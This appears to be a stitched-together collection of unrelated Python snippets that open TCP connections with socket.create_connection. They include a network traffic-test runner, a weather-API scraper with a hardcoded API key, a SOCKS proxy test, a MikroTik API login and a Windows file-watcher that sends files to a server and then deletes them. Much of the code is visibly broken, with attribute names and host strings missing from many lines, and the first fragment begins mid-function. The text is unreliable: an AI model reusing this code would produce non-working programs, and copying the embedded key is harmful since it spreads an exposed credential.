# Wait for STARTED response msg = TrafficMessage.recv(sc_in) assert msg.message is TrafficResponseType.STARTED assert == r_id # Post-STARTED, pre-RESULTS logic for i in range(len(instances)): instance = instances[i] if instance.is_uplink: args[i] = self._run_test( test_ids[i], server_instances[i].ip, instance.ip, server_instances[i].port) # Wait for RESULTS message msg = TrafficMessage.recv(sc_in) assert msg.message is TrafficResponseType.RESULTS assert == r_id results = msg.payload # Signal to end connection msg = TrafficRequest(TrafficRequestType.EXIT) msg.send(sc_out) # Close out network ifaces net_iface_index = TrafficTest._iproute.link_lookup( ifname=TrafficTest._net_iface)[0] # For some reason the first call to flush this address flushes all # the addresses brought up during testing. But subsequent flushes # do nothing if the address doesn't exist for i in range(len(instances)): TrafficTest._iproute.flush_addr(index=net_iface_index, address=instances[i].ip.exploded) # Do socket cleanup sc_in.close() sc_out.close() sc.shutdown(socket.SHUT_RDWR) # Ensures safe socket closure sc.close() # Cache results after cleanup with self._test_lock: self._results = results finally: # Signal that we're done self._done.set()
def get_my_ip(robot_ip, port): s = socket.create_connection((robot_ip, port)) tmp = s.getsockname()[0] s.close() return tmp
def sock_create_connection(address): return socket.create_connection(address)
import bs4 import requests res = requests.get("") soup = bs4.BeautifulSoup(res.text, 'lxml') quote = soup.find('img', {"class": "p-qotd"}) t1 = quote['alt'] #print(t1) import socket import requests try: city = "MUMBAI" socket.create_connection(("", 80)) a1 = "" a2 = "&q=" + city a3 = "&appid=c6e315d09197cec231495138183954bd" api_address = a1 + a2 + a3 res1 = requests.get(api_address) data = res1.json() main = data['main'] temp = main['temp'] #print(temp) #print(city) except OSError: print("check network")
import socket import sys import traceback try: import socks socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, "", 3128) socket.socket = socks.socksocket except ImportError: sys.exit("You must install `socks` to run test.\nlike run `pip install pysocks`") try: sock = socket.create_connection(("", 80)) sock.sendall(b"GET / HTTP/1.1\r\\r\n\r\n") print(sock.recv(4096)) except socket.error: traceback.print_exc() finally: sock.close()
def __init__(self, remote): self._socket = socket.create_connection(remote, DEFAULT_TIMEOUT) # Disable kernel TCP buffering self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
def __init__(self, ip="", port=1337): self.sock = socket.create_connection((ip, port))
def _create_socket(self): return socket.create_connection((, self.port))
def __init__(self, global_source): self.server_ip = socket.gethostbyname(AudioDistributionModule.NUVO_AUDIO_DIST_FQDN) self.conn = socket.create_connection((self.server_ip, AudioDistributionModule.NUVO_AUDIO_DIST_PORT)) self.global_source = global_source self.payload_id = 1
def _run(self): """Run the traffic test Sets up traffic test with remote traffic server and local ifaces, then runs the runner hook into the trfgen binary and collects the results to cache Will block until the test ends """ # Create a snapshot of the test's states, in case they get changed or # wiped in a later operation. Basically, render tests immune to later # operations after the test has started. with self._test_lock: self.instances = copy.deepcopy(self._instances) test_ids = copy.deepcopy(self._test_ids) try: # Set up sockets and associated streams = socket.create_connection(self._remote_server) self.sc_in ="rb") self.sc_out ="wb") # Flush all the addresses left by previous failed tests net_iface_index = TrafficTest._iproute.link_lookup( ifname=TrafficTest._net_iface, )[0] for instance in self.instances: TrafficTest._iproute.flush_addr( index=net_iface_index, address=instance.ip.exploded, ) # Set up network ifaces and get UL port assignments for DL aliases = () for instance in self.instances: aliases += (TrafficTest._iface_up(instance.ip),) if not instance.is_uplink: # Assign a local port for the downlink UE server instance.port = TrafficTest._get_port() # Create and send TEST message msg = TrafficRequest( TrafficRequestType.TEST, payload=self.instances, ) msg.send(self.sc_out) # Receive SERVER message and update test instances msg = TrafficMessage.recv(self.sc_in) assert msg.message is TrafficResponseType.SERVER r_id = # Remote server test identifier server_instances = msg.payload # (TrafficServerInstance, ...) # Locally keep references to arguments passed into trfgen num_instances = len(self.instances) args = [None for _ in range(num_instances)] # Post-SERVER, pre-START logic for i in range(num_instances): instance = self.instances[i] server_instance = server_instances[i] # Add ip network route net_iface_index = TrafficTest._iproute.link_lookup( ifname=TrafficTest._net_iface, )[0] server_instance_network = TrafficTest._network_from_ip( server_instance.ip, 8, ) TrafficTest._iproute.route( "replace", dst=server_instance_network.exploded, iif=net_iface_index, oif=net_iface_index, scope="link", ) # Add arp table entry os.system( "/usr/sbin/arp -s %s %s" % ( server_instance.ip.exploded, server_instance.mac, ), ) if instance.is_uplink: # Port should be the port of the remote for uplink instance.port = server_instance.port else: args[i] = self._run_test( test_ids[i], server_instance.ip, instance.ip, instance.port, ) # Send START for the given r_id msg = TrafficRequest( TrafficRequestType.START, identifier=r_id, ) msg.send(self.sc_out) # Wait for STARTED response msg = TrafficMessage.recv(self.sc_in) assert msg.message is TrafficResponseType.STARTED assert == r_id # Post-STARTED, pre-RESULTS logic for i in range(num_instances): instance = self.instances[i] if instance.is_uplink: args[i] = self._run_test( test_ids[i], server_instances[i].ip, instance.ip, server_instances[i].port, ) # Wait for RESULTS message msg = TrafficMessage.recv(self.sc_in) assert msg.message is TrafficResponseType.RESULTS assert == r_id results = msg.payload # Call cleanup to close network interfaces and open sockets self.cleanup() # Cache results after cleanup with self._test_lock: self._results = results except socket.timeout: print("Running iperf data failed with timeout") TrafficUtil.need_to_close_iperf3_server = True self.cleanup() except Exception as e: print("Running iperf data failed. Error: " + str(e)) TrafficUtil.need_to_close_iperf3_server = True self.cleanup() finally: # Signal that we're done self._done.set()
from miktapi.sentence import sentence_pack, SentenceUnpacker from miktapi.helper import SentenceParser, password_encode from socket import create_connection MIKROTIK_IP = '' MIKROTIK_API_PORT = 8728 MIKROTIK_API_USERNAME = '******' MIKROTIK_API_PASSWORD = '******' SOCKET_TIMEOUT = 3 sock = create_connection((MIKROTIK_IP, MIKROTIK_API_PORT), SOCKET_TIMEOUT) need_close_socket = False # initial login sock.sendall(sentence_pack(['/login', '.tag=login'])) sentence_unpacker = SentenceUnpacker() while True: data = sock.recv(4096) # exit loop if connection closed by Mikrotik if data == b'': break sentence_unpacker.feed(data) for sentence in sentence_unpacker: print('GOT=', sentence)
def connect(self): """Connect to the host and port specified in __init__.""" self.sock = socket.create_connection((, self.port), self.timeout, self.source_address) if self._tunnel_host: self._tunnel()
handle = win32file.CreateFile(fn, ntsecuritycon.FILE_GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None) except win32file.error as exc: if exc.winerror == 32: continue # Keep waiting else: raise # If we get here, we should have a file open for reading. # So now, and only now, we establish a link to the server. if file == "T-888": # Terminator! # Don't send this to the server - terminate everything here instead. win32file.CloseHandle(handle) os.remove(fn) sys.exit(0) sock = socket.create_connection((HOST, PORT)) basename = os.path.split(fn)[-1] sock.send(basename.encode("UTF-8") + b"\n") while "moar bytes": err, chunk = win32file.ReadFile(handle, 8192) if err or not chunk: break sock.send(chunk) sock.close() win32file.CloseHandle(handle) break # No more sleeping needed! # Delete the file when sent. Remove this line if not wanted. os.remove(fn)
def open_connection(): host, port =, server.port sock = socket.create_connection((host, port)) return BufferedSocket(sock)
def connect(self): # recommended by Gatan to use localhost IP to avoid using tcp self.sock = socket.create_connection(('', self.port))
def open_connection(): host, port =, server.port sock = socket.create_connection((host, port)) return sock.makefile("rb")
def __init__(self, host, port): super(MyStream, self).__init__() self.sock = socket.create_connection((host, port))